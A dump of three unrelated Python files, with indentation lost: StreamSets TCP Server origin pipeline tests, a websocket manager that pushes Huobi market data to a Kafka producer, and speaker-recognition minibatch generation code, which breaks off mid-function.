sdc_executor.add_pipeline(tcp_server_pipeline)
sdc_executor.start_pipeline(tcp_server_pipeline)
# Send message to test connection is open.
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
tcp_client.send_str_and_ack(expected_message + '\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 1)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records = [record.field['text'] for record in wiretap.output_records]
assert len(output_records) == 1
assert expected_message == output_records[0]
def test_tcp_server_multiple_messages(sdc_builder, sdc_executor):
"""Runs a test using 4 pipelines with the TCP Server Origin writing to wiretap and checking all records sent by the
client are correctly received by the TCP Server Origin. Pipeline configurations are:
1) No record_processed_ack_message and No batch_completed_ack_message
2) record_processed_ack_message and No batch_completed_ack_message
3) No record_processed_ack_message and batch_completed_ack_message
4)record_processed_ack_message and batch_completed_ack_message
All pipelines look like below but with different configuration as explained above:
TCP Server >> wiretap
"""
# Build and test pipeline number 1.
tcp_server_pipeline_1, wiretap_1 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=False, batch_ack=False)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_1, wiretap_1)
# Build and test pipeline number 2.
tcp_server_pipeline_2, wiretap_2, = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=True, batch_ack=False)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_2, wiretap_2)
# Build and test pipeline number 3.
tcp_server_pipeline_3, wiretap_3 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=False,
batch_ack=True)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_3, wiretap_3)
# Build and test pipeline number 4.
tcp_server_pipeline_4, wiretap_4 = _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor,
record_ack=True,
batch_ack=True)
_run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline_4, wiretap_4)
@sdc_min_version('3.4.2')
def test_tcp_server_ssl(sdc_builder, sdc_executor):
"""Runs a test using the TCP server origin pipeline with Enable TLS set and asserts that the file is received"""
expected_msg = _get_expected_message(TCP_SSL_FILE_PATH)
# Start TCP server pipeline.
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server = pipeline_builder.add_stage('TCP Server')
tcp_server.set_attributes(data_format='TEXT',
port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
use_tls=True,
keystore_file=TCP_KEYSTORE_FILE_PATH,
keystore_type='JKS',
keystore_password='password',
keystore_key_algorithm='SunX509',
use_default_protocols=True,
use_default_cipher_suites=True)
wiretap = pipeline_builder.add_wiretap()
tcp_server >> wiretap.destination
tcp_server_ssl_pipeline = pipeline_builder.build(title='TCP Server SSL pipeline')
sdc_executor.add_pipeline(tcp_server_ssl_pipeline)
sdc_executor.start_pipeline(tcp_server_ssl_pipeline)
# Send twice the data. Even though batch_size = 2, 2 batches are sent (1 for each connection).
_send_tcp_ssl_file(sdc_executor)
_send_tcp_ssl_file(sdc_executor)
sdc_executor.wait_for_pipeline_metric(tcp_server_ssl_pipeline, 'input_record_count', 2)
sdc_executor.stop_pipeline(tcp_server_ssl_pipeline)
# Verify the results. First check number of batches received is 2.
history = sdc_executor.get_pipeline_history(tcp_server_ssl_pipeline)
assert history.latest.metrics.counter('pipeline.batchCount.counter').count == 2
# Then check last batch received in wiretap contains the expected message.
assert len(wiretap.output_records) == 2
assert str(wiretap.output_records[0].field['text']) in expected_msg.decode("utf-8")
assert str(wiretap.output_records[1].field['text']) in expected_msg.decode("utf-8")
def test_tcp_multiple_ports(sdc_builder, sdc_executor):
""" Runs a test using TCP Server as Origin and Trash as destination. TCP Server will be listening to ports 55555 and
44444. Two clients will be writing in parallel to one of these ports (each client to a different port). While
clients are writing it will be checked no exception is thrown due to TCP Server pool exhausted.
Pipeline looks like:
TCP Server >> trash
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(55555), str(44444)],
number_of_receiver_threads=5,
tcp_mode='DELIMITED_RECORDS',
max_batch_size_in_messages=100,
batch_wait_time_in_ms=6000,
max_message_size_in_bytes=40960,
data_format='TEXT',
max_line_length=10240)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(title='TCP Server Origin 20 threads 2 ports')
sdc_executor.add_pipeline(tcp_server_pipeline)
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
expected_message = 'hello_world'
total_num_messages = 0
message_counter = 0
expected_messages_list = []
# Create tcp client listening to port 55555.
tcp_client_socket_port_55555 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket_port_55555.connect((sdc_executor.server_host, 55555))
# Create tcp client listening to port 44444.
tcp_client_socket_port_44444 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket_port_44444.connect((sdc_executor.server_host, 44444))
# Send messages for both tcp clients.
for _ in range(0, 1000):
expected_message_bytes = bytes(f'{message_counter}{expected_message}\n', 'utf-8')
_send_asynchronous_message_multiple_clients([tcp_client_socket_port_55555, tcp_client_socket_port_44444],
expected_message_bytes)
# Append twice the message to the list as two clients sending send message.
expected_messages_list.append(f'{message_counter}{expected_message}')
expected_messages_list.append(f'{message_counter}{expected_message}')
message_counter += 1
total_num_messages += 2
# Close clients.
tcp_client_socket_port_55555.close()
tcp_client_socket_port_44444.close()
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 1000)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == total_num_messages
assert sorted(output_records_values) == sorted(expected_messages_list)
def test_tcp_epoll_enabled(sdc_builder, sdc_executor):
""" Run a pipeline with TCP Server Origin having Epoll Enabled as well as setting number of threads to 5 and
validate it correctly starts and receives data from a client.
Pipeline looks like:
TCP Server >> wiretap
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
number_of_receiver_threads=5,
enable_native_transports_in_epoll=True,
tcp_mode='DELIMITED_RECORDS',
max_batch_size_in_messages=1000,
batch_wait_time_in_ms=6000,
max_message_size_in_bytes=40960,
data_format='TEXT',
max_line_length=10240)
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(title='TCP Server Origin 5 threads 1 port Epoll Enabled')
sdc_executor.add_pipeline(tcp_server_pipeline)
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
expected_message = 'hello_world'
total_num_messages = 0
expected_messages_list = []
# Create tcp client.
tcp_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client_socket.connect((sdc_executor.server_host, TCP_PORT))
# Send messages for this tcp client.
for _ in range(0, 500):
message = f'{total_num_messages}_{expected_message}'
tcp_client_socket.sendall(bytes(message + '\n', 'utf-8'))
expected_messages_list.append(message)
total_num_messages += 1
tcp_client_socket.close()
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 500)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == total_num_messages
assert sorted(output_records_values) == sorted(expected_messages_list)
def _send_asynchronous_message_multiple_clients(client_socket_list, message_bytes):
""" Sends message_bytes for each client in client_socket_list
:param client_socket_list: The list of TCP client sockets
:param message_bytes: the bytes of the message to send
"""
threads_list = []
for client_socket in client_socket_list:
thread = Thread(target=_send_synchronous_message, args=(client_socket, message_bytes))
threads_list.append(thread)
thread.start()
for thread in threads_list:
thread.join()
def _send_synchronous_message(client_socket, message_bytes):
client_socket.sendall(message_bytes)
def _send_tcp_ssl_file(sdc_executor):
"""Sends a file through tcp using ssl"""
hostname = sdc_executor.server_host
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with socket.create_connection((hostname, TCP_PORT)) as sock:
with context.wrap_socket(sock, server_hostname=hostname) as ssock:
file_to_send = open(TCP_SSL_FILE_PATH, 'rb')
ssock.sendfile(file_to_send)
file_to_send.close()
ssock.close()
def _get_expected_message(file_path):
file_to_read = open(file_path, 'rb')
message = file_to_read.readline()
file_to_read.close()
return message
def _add_tcp_pipeline_multiple_messages(sdc_builder, sdc_executor, record_ack, batch_ack):
"""Add a TCP Server to Trash pipeline to the given sdc_executor setting a record ack if record_ack is true or
setting a batch ack batch_ack is true.
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
tcp_server_stage = pipeline_builder.add_stage('TCP Server').set_attributes(port=[str(TCP_PORT)],
tcp_mode='DELIMITED_RECORDS',
data_format='TEXT')
if record_ack:
tcp_server_stage.set_attributes(record_processed_ack_message='Record Processed')
if batch_ack:
tcp_server_stage.set_attributes(batch_completed_ack_message='Batch Completed')
wiretap = pipeline_builder.add_wiretap()
tcp_server_stage >> wiretap.destination
tcp_server_pipeline = pipeline_builder.build(
title=f'TCP Server Origin {"with record ack" if record_ack else "no record ack"} '
f'{"and batch ack" if batch_ack else "and no batch ack"}')
sdc_executor.add_pipeline(tcp_server_pipeline)
return [tcp_server_pipeline, wiretap]
def _run_pipeline_send_tcp_messages(sdc_executor, tcp_server_pipeline, wiretap):
""" Runs the given tcp_server_pipeline and sends num_messages_by_client messages for each client where each
position in num_messages_by_client indicates the number of messages to send for the next client, for example: first
client will send num_messages_by_client[0] messages and so on. The number of clients is num_clients, therefore
num_clients must be equal to len(num_messages_by_client). After that it stops the pipeline and checks that the
number of messages received by the pipeline is the same as the sum of number of messages sent by each the client.
seconds_to_wait_before_close indicates the number of seconds to wait before closing for each client. If
seconds_to_wait_before_close is zero then there is no wait for that client. seconds_to_wait_before_close[0]
indicates the time to wait for first client and so on.
"""
message = 'hello world'
# Run pipeline.
sdc_executor.start_pipeline(tcp_server_pipeline)
# Process each client.
for _ in range(0, 3):
# Create tcp client.
tcp_client = TCPClient(sdc_executor.server_host, TCP_PORT)
# Send messages for this tcp client.
tcp_client.send_str_and_ack(message + '\n')
sdc_executor.wait_for_pipeline_metric(tcp_server_pipeline, 'input_record_count', 3)
sdc_executor.stop_pipeline(tcp_server_pipeline)
output_records_values = [str(record.field['text']) for record in wiretap.output_records]
assert len(output_records_values) == 3
assert output_records_values == 3 * [message]
|
websocket_manager.py
|
import json
import time
from threading import Thread, Lock
from queue import Queue
from typing import Callable
from gzip import decompress
from websocket import WebSocketApp
from confluent_kafka import Producer
class WebsocketManager():
_CONNECT_TIMEOUT_S = 5
def __init__(self, url: str, subscribe: Callable, unsubscribe: Callable):
"""
subscribe is a function that's called right after the websocket connects.
unsubscribe is a function that's called just before the websocket disconnects.
both subscribe and unsubscribe MUST have one argument, which is an instance of
WebsocketManager (see KrakenWsManagerFactory in ws_factories.py for an example).
"""
self.connect_lock = Lock()
self.ws = None
self.queue = Queue()
self.url = url
self.subscribe = subscribe
self.unsubscribe = unsubscribe
self.connect()
conf = {
'bootstrap.servers': 'SSL://kafka-16054d72-gda-3ad8.aivencloud.com:18921',
'security.protocol' : 'SSL',
'client.id': 'kafka-python-producer',
'ssl.certificate.location': '../../jay.cert',
'ssl.key.location': '../../jay.key',
'ssl.ca.location': '../../ca-aiven-cert.pem',
}
self.producer = Producer(conf)
def _acked(self, err, msg):
if err is not None:
print("Failed to deliver message: {}".format(err))
else:
#delivered_records += 1
print("Produced record to topic {} partition [{}] @ offset {}"
.format(msg.topic(), msg.partition(), msg.offset()))
def get_msg(self):
"""
Retrieves a message from the front of the queue.
NOTE: The message received has an extra field "received_timestamp", which
is the UTC timestamp of when the message was received in milliseconds.
"""
return self.queue.get()
def _on_message(self, ws, message):
message = json.loads(decompress(message))
if isinstance(message, dict):
message["receive_timestamp"] = int(time.time()*10**3)
try:
self.producer.produce(f"test-huobi-raw", value=json.dumps(message), on_delivery=self._acked)
self.producer.poll(0)
except Exception as e:
print("An error occurred while producing: %s" % e)
def get_q_size(self):
"""Returns the size of the queue"""
print(f"Queue Backlog: {self.queue.qsize()}")
def send(self, message):
"""Sends a message over the websocket"""
self.connect()
self.ws.send(message)
def send_json(self, message):
"""Sends a json message over the websocket"""
self.send(json.dumps(message))
def _connect(self):
"""Creates a websocket app and connects"""
assert not self.ws, "ws should be closed before attempting to connect"
self.ws = WebSocketApp(
self.url,
on_message=self._wrap_callback(self._on_message),
on_close=self._wrap_callback(self._on_close),
on_error=self._wrap_callback(self._on_error),
)
wst = Thread(target=self._run_websocket, args=(self.ws,))
wst.daemon = True
wst.start()
# Wait for socket to connect
ts = time.time()
while self.ws and (not self.ws.sock or not self.ws.sock.connected):
if time.time() - ts > self._CONNECT_TIMEOUT_S:
self.ws = None
raise Exception(
f"Failed to connect to websocket url {self._get_url()}")
time.sleep(0.1)
def _wrap_callback(self, f):
"""Wrap websocket callback"""
def wrapped_f(ws, *args, **kwargs):
if ws is self.ws:
try:
f(ws, *args, **kwargs)
except Exception as e:
raise Exception(f'Error running websocket callback: {e}')
return wrapped_f
def _run_websocket(self, ws):
""""Runs the websocket app"""
try:
ws.run_forever(ping_interval=30)
except Exception as e:
raise Exception(f'Unexpected error while running websocket: {e}')
finally:
pass
# self._reconnect(ws)
def _reconnect(self, ws):
"""Closes a connection and attempts to reconnect"""
assert ws is not None, '_reconnect should only be called with an existing ws'
if ws is self.ws:
self.ws = None
ws.close()
self.connect()
def connect(self):
"""Connects to the websocket"""
if self.ws:
return
with self.connect_lock:
while not self.ws:
self._connect()
if self.ws:
self.subscribe(self)
return
def resubscribe(self):
self.unsubscribe()
self.subscribe()
def _on_close(self, ws, a, b):
print("Connection Closed")
self.unsubscribe(self)
self._reconnect(ws)
def _on_error(self, ws, error):
print(f"websocket error: {error}")
self._reconnect(ws)
def reconnect(self) -> None:
if self.ws is not None:
self._reconnect(self.ws)
|
mbatch_generation.py
|
# Code for generating mini-batches. The outout can be any
# combination of:
# features/0-stats/1-stats/i-vectors/labels/scp-indices
#
# scp-indices means which position in the data had. This
# can for example be used for looking up a trial weight
# from a list or for accessing data that is already
# loaded to the GPU.
#
# There are three different generators:
#
# gen_mbatch_spk_all_utts:
# Generates minibatches that each contains all the utterances
# from a small set of speakers. The batch size is controlled
# by setting The order of the speakers is "max_spk_per_batch"
# and "max_utt_per_batch". The order of speakers is
# determined by a function, "randomize_spk_id_order", which
# will be called before the training starts as well as after
# all speakers in the training set have been used. This function
# can be provided by the user. For example, it can be a function
# that simply randomizes the speakers. But we could also consider
# to make a function that puts e.g. 10 "similar" speakers in
# consequtively and max_spk_per_batch=10 to get them in the same
# batch.
# gen_mbatch_utt_groups
# This generator gives batches according to a list of "utterance groups"
# A function that generate the utterance groups needs to be provided.
# This function will be called before the training starts as well as
# after all data have been used so that it can be re-shuffled (or re-ordered
# according to some other rule)
# Assumming it gives [g1, g2,...] where gi is a group of utterances, e.g.,
# g1 = [u11, u12, u13,...]
# The generator has three options to form mini-batches.
# 1, "diag": Minibatches are (g1 - g1), (g2 - g2), (g3 - g3),...
# 2, "rowwise": Minibatches are (g1 - g1), (g1 - g2), (g1 - g3),...,(g2 - g2), (g2 - g3)..., (g3 - g3)
# All possible batches are looped throuhg in order. Advantage: One use the data more per
# copying to the GPU (BUT THIS REMAINS TO BE IMPLEMENTED.)
# Disadvantage: Consequetive batches, e.g. (g1 - g1) and (g1 - g2) are more statistically dependent.
# 3, "random": Minibatches are (gi - gj),... Indices "i" and "j" are generated randomly until all
# possible batces have been used
#
# gen_mbatch_trials --NOT IMPLEMENTED YET--
# Will take a list of (difficult) trials and divide into batches.
from utils.misc import get_logger
log = get_logger()
import h5py, os, time
from pympler.asizeof import asizeof
import sys
import numpy as np
import threading
########################################################################################
### General functions for processing the scp, loading data, etc.
def get_hard_impostor_info(scp, n_scores=None):
#print("e")
spk2hardImpID = {}
spk2hardImpScr = {}
try:
with open(scp, 'r') as f:
for line in f:
spk1, spk2, utt1, utt2, scr, lab = line.rstrip().split(" ")
if spk1 in spk2hardImpID:
spk2hardImpID[spk1].append( spk2 )
spk2hardImpScr[spk1].append( float(scr) )
else:
spk2hardImpID[spk1] = [ spk2 ]
spk2hardImpScr[spk1] = [ float(scr) ]
if spk2 in spk2hardImpID:
spk2hardImpID[spk2].append( spk1 )
spk2hardImpScr[spk2].append( float(scr) )
else:
spk2hardImpID[spk2] = [ spk1 ]
spk2hardImpScr[spk2] = [ float(scr) ]
except:
print("Could not read %s".format(scp) )
sys.exit(1)
# Sort according to scores
for spk in spk2hardImpID.keys():
sort_idx = np.flip( np.argsort(spk2hardImpScr[spk]) ) # flip is for getting descending sort
sort_scr = [spk2hardImpScr[spk][i] for i in sort_idx[:n_scores] ]
sort_id = [spk2hardImpID[spk][i] for i in sort_idx[:n_scores] ]
spk2hardImpScr[spk] = sort_scr
spk2hardImpID[spk] = sort_id
return spk2hardImpScr, spk2hardImpID
####
# Gathers speaker info from an scp.
def get_kaldi_scp_info( scp, spk_name_old = [] ):
print("Processing data info in" + scp )
utt2file = []
utt2fid = []
spk_ids = []
utt2sideInfo = []
scpInd = 0
ark_files = {}
utt2scpInd = []
fid2file = {}
f = open(scp, 'r')
for line in f:
scp_info = line.rstrip().split(" ")
n_scp_col = len(scp_info)
spk_id = scp_info[0]
f_id = scp_info[1]
f_name = scp_info[2]
fid2file[f_id] = f_name
utt2fid.append(f_id)
spk_ids.append( spk_id )
utt2file.append( f_name )
if ( len(scp_info) ==4 ):
s = scp_info[3].split(":")
utt2sideInfo.append( [int(ss) for ss in s] )
ark_files[ f_name.split(":")[0] ] = 1
utt2scpInd.append(scpInd)
scpInd += 1
n_ark_not_found = 0
for k in ark_files.keys():
if ( not os.path.isfile( k ) ):
log.warning( "WARNING: %s doesn't exist", k )
n_ark_not_found += 1
if ( n_ark_not_found > 0 ):
log.warning("WARNING: A total of ark files were not found." % str( n_ark_not_found ) )
f.close()
if (len(spk_name_old) == 0):
[ spk_name, utt2spk, spk_counts ] = np.unique( spk_ids, return_inverse=True, return_counts=True )
else:
log.info("Using OLD spkID_2_spk_name")
[ spk_name_tmp, utt2spk, spk_counts_tmp ] = np.unique( spk_ids, return_inverse=True, return_counts=True )
log.info( "#spk in this scp: %d", len(spk_name_tmp) )
log.info( "#spk in old scp: %d", len(spk_name_old) )
spk_name_to_spk_id_old = {}
for i,n in enumerate( spk_name_old ):
spk_name_to_spk_id_old[n]=i
new_spk_to_old_spk = [spk_name_to_spk_id_old[n] for n in spk_name_tmp]
spk_name = spk_name_old
for i in range(len(utt2spk)):
utt2spk[i] = new_spk_to_old_spk[ utt2spk[i] ]
spk_counts = np.zeros( len(spk_name_old) )
for i in range(len( spk_counts_tmp )):
spk_counts[ new_spk_to_old_spk[i] ] = spk_counts_tmp[i]
assert(np.sum(spk_counts) == np.sum(spk_counts_tmp) )
log.info("#utts: %d", len(utt2spk) )
log.info("Min spk id: %d, Max spk id: %d" % (np.min(utt2spk), np.max(utt2spk)))
print("Processed " + str(scpInd) + " scp entries")
print("Found " + str(len(utt2spk)) + " utterances and " + str(len(spk_name)) + " speakers.")
# Create the scp info dictionary. Note that other scripts may produce and additional entry
# called 'utt2scpInd'. See comment there.
scp_info = { 'spk_name' : spk_name, 'utt2spk' : utt2spk,
'spk_counts' : spk_counts, 'utt2file' : utt2file,
'utt2scpInd' : utt2scpInd, 'utt2sideInfo' : utt2sideInfo,
'utt2fid': utt2fid, 'fid2file':fid2file }
return scp_info
###
# Function for loading 0th and/or 1st order stats
def load_stats(stats_dir, files, stats_order):
first = True
for f in files:
try:
with h5py.File(stats_dir + '/' + f + '.h5', 'r', driver='core') as fh:
if (stats_order == 0):
if ( first ):
stats = np.array(fh['N'])[None,:]
first = False
else:
stats = np.concatenate((stats, np.array(fh['N'])[None,:]))
elif (stats_order == 1):
if ( first ):
stats = np.array(fh['F'])
first = False
else:
stats = np.concatenate((stats, np.array(fh['F'])))
elif (stats_order == 2):
if ( first ):
stats0 = np.array(fh['N'])[None,:]
stats1 = np.array(fh['F'])
first = False
else:
stats0 = np.concatenate((stats0, np.array(fh['N'])[None,:]))
stats1 = np.concatenate((stats1, np.array(fh['F'])))
except IOError:
raise Exception("Cannot open stats file [%s] for reading" % f)
if (stats_order ==2 ):
return [stats0, stats1]
else:
return [stats]
########################################################################################
# Functions for arranging speakar IDs. The batch generator
# will call one of these functions whenever the whole data
# set has been looped through.
def keep_spk_id_order(spk_name):
print("The order of speaker IDs will not be changed")
n_spk = len(spk_name)
return np.arange(0, n_spk)
def randomize_spk_id_order(spk_name, seed=123):
rng = np.random.RandomState(seed)
n_spk = len(spk_name)
spk_id = rng.permutation(list(range(0, n_spk))) # Randomize the numbers from 0 to N - 1
print("The order of the speaker IDs has been randomized with seed" + str(seed))
return spk_id
# This generator gives batches with all utterances from
# some speakers.
# ivec_dir, stats_dir, feat_dir should be either a path or None.
# If None, this data will not be loaded.
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
def gen_mbatch_spk_all_utts(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
max_spk_per_batch=10, max_utt_per_batch=300,
y_function=None, verbose=False, allow_roll_over=False,
arrange_spk_fcn=keep_spk_id_order, output_labs=True, output_scp_ind=False, output_utt_id=False):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
# Number of speakers
n_spk = len( spk_counts )
i = 0 # Minibatch index
j = 0 # Speaker index
while True:
# For checking the time to create the batch
if (verbose):
start_time = time.time()
# If we have used the last data of our training set,
# we rearrange the speaker IDs.
# Note: This will happen regardless off the value of allow_roll_over
if ( j == 0 or spk_indices_batch[0] > spk_indices_batch[-1]):
print("Order the speakers")
spk_ids = arrange_spk_fcn( spk_name )
finish_set = False
# Set the indices for the batch. We will add 1 speaker
# until we reach the desired number of speakers or the
# maximum number of utterance per batch limit
n_spk_batch = 0 # Number of speaker in the batch
n_utts_batch = 0 # Number of utterances in the batch
spk_indices_batch = [] # The speaker indices we will use
to_many_speakers = False
to_many_utterances = False
finish_set = False
while not ((to_many_speakers) or (to_many_utterances) or (finish_set)):
n_utts_batch += spk_counts[ spk_ids[ j ] ]
n_spk_batch += 1
spk_indices_batch.append( j )
# Increase the spk index. The modulo is to start over from the
# beginning again when we reach the last speaker.
j = ( j + 1 ) % n_spk
# Check criteria for stopping the loop
finish_set = ( ( j == 0 ) and ( not allow_roll_over ) )
to_many_speakers = ( n_spk_batch + 1 > max_spk_per_batch)
to_many_utterances = ( n_utts_batch + spk_counts[ spk_ids[j] ] > max_utt_per_batch )
# Make a list of utterances (i-vectors) of the batch corresponding to
# all utterance of the selected speaker.
utts = np.hstack([np.where(utt2spk ==s)[0]] for s in spk_ids[ spk_indices_batch ]).squeeze(axis=0)
#print utts
#print utts.shape
files = [ utt2file[u] for u in utts ]
i += 1 # Increase the batch index
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
# Print some info about the batch
if (verbose):
print(" ")
print("***")
print(" Preparing batch " + str(i) + " at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print(" speakers " + str( spk_indices_batch[ 0 ] ) + " - " + str( spk_indices_batch[ -1 ] ) + ", out of (n_spk) " + str(n_spk))
print(" n_spk_batch " + str(n_spk_batch) + " n_utts_batch " + str(n_utts_batch))
print(" speaker indices " + str( spk_indices_batch ))
print(" speaker IDs " + str( spk_ids[spk_indices_batch] ))
print(" sessions per speaker " + str ( spk_counts[spk_ids[spk_indices_batch]] ))
out_data_size = asizeof(data)
if (out_data_size > 1073741824):
print(" The batch size is %0.2f GB" % ( out_data_size / 1073741824.0 ))
elif (out_data_size > 1048576):
print(" The batch size is %0.2f MB" % ( out_data_size / 1048576.0 ))
elif (out_data_size > 1024):
print(" The batch size is %0.2f KB" % ( out_data_size / 1024.0 ))
else:
print(" The batch size is %0.2f B" % ( out_data_size ))
print(" Time taken to prepare batch: " + str( time.time() - start_time ) + "s")
print(" Done preparing batch at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print("***")
yield data
########################################################################################
# gen_mbatch_utt_groups
def create_utt_group_1( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd,
single_per_multi_groups = 500, rng=np.random):
s = []
for i in range(0,len(spk_counts) ):
# Get the utterances for a speaker.
spk_utts = np.where(utt2spk ==i )[0][rng.permutation( spk_counts[i])]
# Divide the speakers utterances into groups
if (spk_counts[i] ==1 ):
s.append( [spk_utts[0]] )
elif (spk_counts[i] % 2 == 0):
for j in range(0, spk_counts[i], 2):
s.append( [spk_utts[j], spk_utts[ j +1 ] ] )
else:
s.append([ spk_utts[0], spk_utts[ 1], spk_utts[2] ])
for j in range(3, spk_counts[i], 2):
s.append( [spk_utts[j], spk_utts[ j +1 ] ] )
# Randomize s (otherwise same speakers will always end up together)
s = [s[k] for k in rng.permutation(len(s))]
# Now groups ("pairs") in s will be grouped together to larger groups. Such groups are later used to form batches.
# "single_per_multi_groups" is how many "pairs" we want to have per such a group.
utts = []
ids = []
n_single_spk_groups = len(s)
# Number of large groups are rounded down. For example, if n_single_spk_groups=103
# and single_per_multi_groups=10, we will use 10 groups.
n_multi_spk_groups = n_single_spk_groups / single_per_multi_groups
print("n_single_spk_groups:" + str(n_single_spk_groups))
print("n_multi_spk_groups:" + str(n_multi_spk_groups))
# Here we group the "pairs" together. With the example numbers above, we get the following:
# idx = ceil( 10.3 * [1,2,..,10] ) = ceil([10.3,...,103]) = [ 11, 21, 31, 42, 52, 62, 73, 83, 93, 103]
# This can fail in rare cases. Something numerical makes the last index x.000000001 which is ceiled.
# ---NEED TO BE FIXED
# As long as this does not happen, it should give the desired output.
# The outer "np.ceil" seems unecessary. Remove it?
idx = np.ceil(np.ceil(n_single_spk_groups/float(n_multi_spk_groups) * (np.arange(0, n_multi_spk_groups)+1)).reshape(n_multi_spk_groups,1) )
print(idx.T)
idx = np.concatenate((np.array(0).reshape(1,1), idx), axis=0).astype(int)
print(idx.T)
for i in range(1, n_multi_spk_groups +1):
u = np.hstack( np.array(s[j]) for j in range(idx[i-1], idx[i]))
utts.append([u])
ids.append(utt2spk[ u ])
# Final shuffing to avoid all longer batches in the beginning
r = rng.permutation(len(utts))
utt = [ utts[k] for k in r ]
ids = [ ids [k] for k in r ]
return [utts, ids]
def make_create_utt_group_1( single_per_multi_groups, rng=np.random ):
def create_utt_group(spk_name, utt2spk, spk_counts, utt2file, utt2scpInd ):
return create_utt_group_1( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd, single_per_multi_groups =single_per_multi_groups, rng=rng)
return create_utt_group
# ivec_dir, stats_dir, feat_dir
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
def gen_mbatch_utt_groups(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False, batch_selection="diag",
create_utt_group_list_fcn =create_utt_group_1,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
b = 0 # Batch index
new_epoch = True # This variable indicates whether a new epoch is about to start
while True:
# For checking the time to create the batch
if (verbose):
start_time = time.time()
print(" ")
print("***")
print(" Preparing batch " + str(b) + " at " + time.strftime("%Y-%m-%d %H:%M:%S"))
# If a new epoch is about to start, we will group the utterances.
# The provided function "create_utt_group_list_fcn" is used for this.
# Note: This will happen regardless off the value of allow_roll_over
if ( new_epoch):
print("Obtaining utterances groups")
[groups_u, groups_s] = create_utt_group_list_fcn( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd ) # Are all these inputs needed in general???
new_epoch = False
b = 0
if(batch_selection == "rowwise"):
[ i_ind, j_ind ] =np.triu_indices( len(groups_s) )
elif(batch_selection == "random"):
[ i_ind, j_ind ] =np.triu_indices( len(groups_s) )
r = rng.permutation(len( i_ind ))
i_ind = i_ind[r]
j_ind = j_ind[r]
# Depending on batch selection method, we load/prepare the data
# differently
if (batch_selection == "diag"):
# If "diag" we only need to load the data once
utts = groups_u[b][0]
files = [utt2file[u] for u in utts ]
n_spk_batch = len(np.unique(groups_s[b])) # Number of speaker in the batch
n_utts_batch = len(groups_u[b][0] ) # Number of utterances in the batch
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
if (verbose):
print(" i and j = : " + str(b))
print(" n_spk_batch: " + str(n_spk_batch) + " n_utts_batch " + str(n_utts_batch))
print(" Speakers: " + str( groups_s[b] ))
print(" Utterances: " + str( groups_u[b] ))
b += 1 # Increase the batch index
if b == len(groups_s):
new_epoch = True
elif(batch_selection == "rowwise"):
# In this case, we only load a new "i" batch if it change from
# last time but we always reload the "j" batch.
if ( (b == 0) or ( i_ind[ b] != i_ind[ b] ) ):
utts_i = groups_u[i_ind[ b ]][0]
